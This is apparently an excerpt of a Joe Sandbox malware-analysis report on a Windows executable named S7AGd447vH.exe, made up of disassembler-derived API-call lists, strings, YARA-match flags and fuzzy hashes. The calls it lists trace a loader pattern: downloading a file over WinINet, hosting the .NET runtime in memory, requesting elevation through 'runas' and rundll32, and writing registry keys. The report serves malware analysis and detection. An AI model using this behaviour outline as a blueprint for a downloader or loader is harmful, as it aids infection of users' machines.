                                                                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                  • Instruction Fuzzy Hash:
                                                                                  APIs
                                                                                  • CoInitializeEx.COMBASE(00000000,00000000), ref: 7FE436E1
                                                                                    • Part of subcall function 7FE43663: LoadLibraryW.KERNEL32(mscoree.dll,00000000,02263E58,00000000,00033400,?,7FE43722,?), ref: 7FE43671
                                                                                  • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 7FE4377B
                                                                                  • memcpy.NTDLL(?,00033400,02263E58), ref: 7FE437AB
                                                                                  • SafeArrayGetLBound.OLEAUT32(7FE42E35,00000001,?), ref: 7FE4381A
                                                                                  • SafeArrayGetUBound.OLEAUT32(7FE42E35,00000001,?), ref: 7FE43831
                                                                                  • GetCommandLineW.KERNEL32(00033400), ref: 7FE43853
                                                                                  • CommandLineToArgvW.SHELL32(00000000), ref: 7FE4385A
                                                                                  • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 7FE4386D
                                                                                  • SafeArrayCreateVector.OLEAUT32(00000008,00000000,00033400), ref: 7FE43881
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 7FE43894
                                                                                  • SafeArrayPutElement.OLEAUT32(?,02263E58,00000000), ref: 7FE438A2
                                                                                  • SafeArrayCreateVector.OLEAUT32(00000008,00000000,00000001), ref: 7FE438BA
                                                                                  • SysAllocString.OLEAUT32(7FE453F4), ref: 7FE438C4
                                                                                  • SafeArrayPutElement.OLEAUT32(?,02263E58,00000000), ref: 7FE438D2
                                                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 7FE4390E
                                                                                  • SafeArrayDestroy.OLEAUT32(00033400), ref: 7FE43913
                                                                                  • SafeArrayDestroy.OLEAUT32(00000000), ref: 7FE4392B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$Create$DestroyVector$AllocBoundCommandElementLineString$ArgvInitializeLibraryLoadmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1402434309-0
                                                                                  APIs
                                                                                  • ___free_lconv_mon.LIBCMT ref: 0041D5BF
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D175
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D187
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D199
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D1AB
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D1BD
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D1CF
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D1E1
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D1F3
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D205
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D217
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D229
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D23B
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D24D
                                                                                  • _free.LIBCMT ref: 0041D5B4
                                                                                    • Part of subcall function 00417051: HeapFree.KERNEL32(00000000,00000000,?,0041614E), ref: 00417067
                                                                                    • Part of subcall function 00417051: GetLastError.KERNEL32(?,?,0041614E), ref: 00417079
                                                                                  • _free.LIBCMT ref: 0041D5D6
                                                                                  • _free.LIBCMT ref: 0041D5EB
                                                                                  • _free.LIBCMT ref: 0041D5F6
                                                                                  • _free.LIBCMT ref: 0041D618
                                                                                  • _free.LIBCMT ref: 0041D62B
                                                                                  • _free.LIBCMT ref: 0041D639
                                                                                  • _free.LIBCMT ref: 0041D644
                                                                                  • _free.LIBCMT ref: 0041D67C
                                                                                  • _free.LIBCMT ref: 0041D683
                                                                                  • _free.LIBCMT ref: 0041D6A0
                                                                                  • _free.LIBCMT ref: 0041D6B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                  • String ID:
                                                                                  • API String ID: 161543041-0
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,CorBindToRuntime), ref: 7FE434E6
                                                                                  • GetProcAddress.KERNEL32(?,GetCORVersion), ref: 7FE434F1
                                                                                  • GetProcAddress.KERNEL32(?,GetRequestedRuntimeInfo), ref: 7FE434FC
                                                                                  • wcscmp.NTDLL ref: 7FE43525
                                                                                  • wcscmp.NTDLL ref: 7FE43544
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$wcscmp
                                                                                  • String ID: 2$CorBindToRuntime$GetCORVersion$GetRequestedRuntimeInfo$v1.0.3705$v2.0.50727
                                                                                  • API String ID: 983638816-2194063276
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(0042DDC8,00000000,00000000,00000000,00000000), ref: 00402671
                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402683
                                                                                  • InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 0040269A
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004026AB
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004026AE
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004026BF
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004026C2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandle$Open$FileRead
                                                                                  • String ID: <$PDu$runas
                                                                                  • API String ID: 4294395943-1867505789
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (
                                                                                  • API String ID: 0-3887548279
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004114C7
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 004114CF
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00411558
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00411583
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004115D8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: csm$csm
                                                                                  • API String ID: 1170836740-3733052814
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$___from_strstr_to_strchr
                                                                                  • String ID:
                                                                                  • API String ID: 3409252457-0
                                                                                  APIs
                                                                                  • RegCreateKeyExA.ADVAPI32(80000001,00000001,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00404141
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,00000002,80000001), ref: 00404160
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateOpen
                                                                                  • String ID:
                                                                                  • API String ID: 436179556-0
                                                                                  APIs
                                                                                  • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00407223
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,?), ref: 004072CC
                                                                                  • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 0040735D
                                                                                  • InternetReadFile.WININET(00000000,00000000,000003FF,?), ref: 004073E4
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004073F5
                                                                                  • InternetCloseHandle.WININET(?), ref: 004073FA
                                                                                  • InternetCloseHandle.WININET(?), ref: 004073FF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandle$FileHttpReadRequest$OpenSend
                                                                                  • String ID:
                                                                                  • API String ID: 856522067-0
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,6F380EF0), ref: 00406FB5
                                                                                  • InternetOpenA.WININET(0042DD45,00000000,00000000,00000000,00000000), ref: 00406FCA
                                                                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00406FEA
                                                                                  • InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 00407001
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407043
                                                                                  • InternetCloseHandle.WININET(?), ref: 00407052
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00407055
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandle$FileOpen$CreateRead
                                                                                  • String ID:
                                                                                  • API String ID: 4113138902-0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: api-ms-$ext-ms-
                                                                                  • API String ID: 0-537541572
                                                                                  APIs
                                                                                    • Part of subcall function 0041D2BF: _free.LIBCMT ref: 0041D2E4
                                                                                  • _free.LIBCMT ref: 0041D345
                                                                                    • Part of subcall function 00417051: HeapFree.KERNEL32(00000000,00000000,?,0041614E), ref: 00417067
                                                                                    • Part of subcall function 00417051: GetLastError.KERNEL32(?,?,0041614E), ref: 00417079
                                                                                  • _free.LIBCMT ref: 0041D350
                                                                                  • _free.LIBCMT ref: 0041D35B
                                                                                  • _free.LIBCMT ref: 0041D3AF
                                                                                  • _free.LIBCMT ref: 0041D3BA
                                                                                  • _free.LIBCMT ref: 0041D3C5
                                                                                  • _free.LIBCMT ref: 0041D3D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  APIs
                                                                                  • GetConsoleCP.KERNEL32(?,00403FD0,00000000), ref: 00418EEF
                                                                                  • __fassign.LIBCMT ref: 004190CE
                                                                                  • __fassign.LIBCMT ref: 004190EB
                                                                                  • WriteFile.KERNEL32(?,00403FD0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00419133
                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00419173
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041921F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 4031098158-0
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,7FE453D0,00000000,7FE42E0C,7FE453D0), ref: 7FE43310
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 7FE4331F
                                                                                  • memcpy.NTDLL(00000000,02263E58,?), ref: 7FE4333F
                                                                                  • memcpy.NTDLL(?,02263E58,00000000), ref: 7FE4336A
                                                                                  • IsBadReadPtr.KERNEL32(?,?), ref: 7FE43391
                                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 7FE433AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$memcpy$AllocateFreeProcessRead
                                                                                  • String ID:
                                                                                  • API String ID: 722247336-0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _strrchr
                                                                                  • String ID: I=A
                                                                                  • API String ID: 3213747228-3946403557
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,0041188B,004116F9,00411008), ref: 004118A2
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004118B0
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004118C9
                                                                                  • SetLastError.KERNEL32(00000000,0041188B,004116F9,00411008), ref: 0041191B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  APIs
                                                                                    • Part of subcall function 0040FC60: Concurrency::cancel_current_task.LIBCPMT ref: 0040FD81
                                                                                  • CreateThread.KERNEL32(00000000,00000000,004029C0,00000000,00000000,00000000), ref: 00402A96
                                                                                  • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,?), ref: 00402AA3
                                                                                  • SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00402AAA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
                                                                                  • String ID: runas$rundll32.exe
                                                                                  • API String ID: 1039963361-4081450877
                                                                                  • Opcode ID: d1592217e4478c5ea545865a8189d5ddc7b0323b2a45d0daecc3dde9ef46f0d2
                                                                                  • Instruction ID: cbe1071344162770b1540c7e30956158cd622aecd0bbe1292944266410e95558
                                                                                  • Opcode Fuzzy Hash: d1592217e4478c5ea545865a8189d5ddc7b0323b2a45d0daecc3dde9ef46f0d2
                                                                                  • Instruction Fuzzy Hash: 4141D371211148ABEF18DF28CE99BDD3B66AF45344F50812AF805A73D6C7BDE9C08B58
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TZ$C:\Users\user\Desktop\S7AGd447vH.exe$`%Y
                                                                                  • API String ID: 0-1243407132
                                                                                  • Opcode ID: 7a9d286b55a6d7791a3b78df8b97bf955a391a67a32cee53b2cda71ea7da64e1
                                                                                  • Instruction ID: 38f4d60b3dc3330eb660a12c1bff0bcf569eb7c8f224e468f879af4f1ba56567
                                                                                  • Opcode Fuzzy Hash: 7a9d286b55a6d7791a3b78df8b97bf955a391a67a32cee53b2cda71ea7da64e1
                                                                                  • Instruction Fuzzy Hash: 7741B3B1A10614EFCB21EB9999819EEBBB8EFC5310F10016BF404D7310D7B48A81D799
                                                                                  Strings
                                                                                  • C:\Users\user\Desktop\S7AGd447vH.exe, xrefs: 0041BEED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: C:\Users\user\Desktop\S7AGd447vH.exe
                                                                                  • API String ID: 0-3472667792
                                                                                  • Opcode ID: c55c4c084ad2c230f635acb70b1e9e70acdd672452902c9fb3f822ecf2e8c030
                                                                                  • Instruction ID: 98b84f3662eafc99a63776aa1d9869d5ad61514731121a2dccbac03ca90b7c9c
                                                                                  • Opcode Fuzzy Hash: c55c4c084ad2c230f635acb70b1e9e70acdd672452902c9fb3f822ecf2e8c030
                                                                                  • Instruction Fuzzy Hash: 132195712041097F9B14AF72CC819EB776CEF00368710491AF929D7651EB39DDD29BE8
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wcsrchr
                                                                                  • String ID: .bat$.cmd$.com$.exe
                                                                                  • API String ID: 1752292252-4019086052
                                                                                  • Opcode ID: 77ddbc1fb28f9346dad7768a5891c9b58b5a2fbbf90a09ed820187877b3d27dc
                                                                                  • Instruction ID: 6f70c85177786f58d52e2084dd49b61e1baffeb1d3a2e9057e97d842c7ddf161
                                                                                  • Opcode Fuzzy Hash: 77ddbc1fb28f9346dad7768a5891c9b58b5a2fbbf90a09ed820187877b3d27dc
                                                                                  • Instruction Fuzzy Hash: CA010437B04226322A35551AAE027AB57898B82BB5726402FF854E73C0FE4DDE82019C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: api-ms-
                                                                                  • API String ID: 0-2084034818
                                                                                  • Opcode ID: 1f410769ad7d24a70860011098d06d6ca35ded4aca2c839cfa339bb89b4e2759
                                                                                  • Instruction ID: d3a7a299a8bae97992ab6d63a13964a8bacfe7ebf419c298562bbe63b7ffd96e
                                                                                  • Opcode Fuzzy Hash: 1f410769ad7d24a70860011098d06d6ca35ded4aca2c839cfa339bb89b4e2759
                                                                                  • Instruction Fuzzy Hash: AD11EC31A86725DBC7314B24DD40ADF37549F157A0B110226EA02A73B0FB34DD42C5DC
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00412C48,?,?,00412C10,?,?,?), ref: 00412C68
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00412C7B
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00412C48,?,?,00412C10,?,?,?), ref: 00412C9E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: 9b25b2480156a898975ff9207fa4a0d1f543927fad6c89e789778ca8823a3494
